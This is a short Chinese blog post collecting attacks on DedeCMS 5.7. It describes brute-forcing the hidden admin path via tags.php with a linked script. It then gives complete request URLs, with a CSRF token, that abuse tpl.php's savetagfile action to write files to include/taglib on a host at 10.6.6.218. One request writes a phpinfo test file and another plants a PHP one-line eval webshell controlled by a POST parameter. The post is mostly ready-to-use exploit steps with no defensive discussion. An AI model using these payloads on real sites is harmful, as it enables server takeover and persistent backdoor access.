美文网首页
dedecms漏洞合集

dedecms漏洞合集

作者: q1ya | 来源:发表于2020-01-13 15:06 被阅读0次
    dedecms 5.7后台地址爆破

    1、前提条件,存在tags.php


    2、使用以下脚本爆破 https://github.com/qiya7/daily-code/blob/master/dedecms/dedebackdoor.py
    3、爆破成功,爆破的原理大意就是通过访问图片是否存在会返回不同响应包来判断后台地址
    dedecms5.7 shell文件写入(admin登录状态下)

    1、admin登录状态下,访问http://10.6.6.218/fksgi2ikxjfmw/tpl.php?action=upload,右键查看源码获取token


    2、访问以下url生成phpinfo文件
    https://10.6.6.218/fksgi2ikxjfmw/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=3e0023997cf2227e0f5a5f993e458a5
    3、访问http://10.6.6.218/include/taglib/shell.lib.php查看是否写入成功

    4、执行以下命令写入一句话木马http://10.6.6.218/fksgi2ikxjfmw/tpl.php?filename=test.lib.php&action=savetagfile&content=<?php @eval($_POST['pass']);?>&token=3e0023997cf2227e0f5a5f993e458a55
    5、木马地址为http://10.6.6.218/include/taglib/test.lib.php
    6、注意:写入文件后缀被限制为.lib.php

    相关文章

      网友评论

          本文标题:dedecms漏洞合集

          本文链接:https://www.haomeiwen.com/subject/lkzgactx.html